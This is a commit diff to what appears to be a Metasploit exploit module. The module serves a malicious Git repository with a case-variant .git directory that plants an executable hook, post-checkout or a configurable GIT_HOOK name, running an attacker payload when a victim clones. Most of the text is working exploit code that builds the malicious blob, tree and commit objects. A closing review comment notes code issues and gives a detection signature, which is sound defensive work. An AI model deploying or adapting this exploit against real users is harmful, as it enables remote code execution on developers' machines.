Make malicious hook file name be customizable

bug/bundler_fix
Jon Hart 2014-12-22 08:28:55 -08:00
parent 7f3cfd2207
commit 308eea0c2c
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 12 additions and 6 deletions


@ -62,7 +62,14 @@ class Metasploit4 < Msf::Exploit::Remote
register_options(
[
OptString.new('URIPATH', [true, 'The URI to use as the malicious Git instance', '/got.git'])
])
]
)
register_advanced_options(
[
OptString.new('GIT_HOOK', [true, 'The Git hook to use for exploitation', 'post-checkout'])
]
)
end
def setup
@ -76,14 +83,14 @@ class Metasploit4 < Msf::Exploit::Remote
# .git/hooks/post-checkout and will subsequently execute commands of our
# choosing upon cloning
@file_paths = {}
# build the post-update file blob
# build the hook file blob
full_cmd = "#!/bin/sh\n#{payload.encoded}"
sha1, content = build_object('blob', full_cmd)
@file_paths["/objects/#{get_path(sha1)}"] = content
# build tree that points to the blob
sha1, content = build_object('tree', "100755 post-checkout\0#{[sha1].pack('H*')}")
sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}")
@file_paths["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the hooks directory in which post-update lives
# build a tree that points to the hooks directory in which the hook lives, called hooks
sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}")
@file_paths["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the partially uppercased .git directory in
@ -120,8 +127,7 @@ class Metasploit4 < Msf::Exploit::Remote
vprint_status("Malicious commit is:")
commit.each_line { |l| vprint_status(l.strip) }
end
commit_content = "tree #{sha1}\n#{commit}"
sha1, content = build_object('commit', commit_content)
sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
@file_paths["/objects/#{get_path(sha1)}"] = content
# build HEAD
@file_paths['/HEAD'] = "ref: refs/heads/master\n"
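Review bot: The context comment at the top of the second hunk still says `# .git/hooks/post-checkout and will subsequently execute commands of our`, which is stale now that the tree entry name comes from `datastore['GIT_HOOK']`; it should read `# .git/hooks/<GIT_HOOK> and will subsequently execute commands of our`. The option value is also interpolated unchecked into the binary tree entry `"100755 #{datastore['GIT_HOOK']}\0..."`, so a value containing `/` or a NUL byte would presumably produce a malformed tree object; a check at the start of `setup` that raises on such names would fail early instead of serving a broken repository. For readers deriving detections from this module, the hook file name is no longer a fixed string, so a signature should key on a `hooks` tree under a case-variant `.git` directory rather than on the literal `post-checkout`. The body of `setup` begins before the second hunk and continues past the third, so the rest of the method was not reviewed.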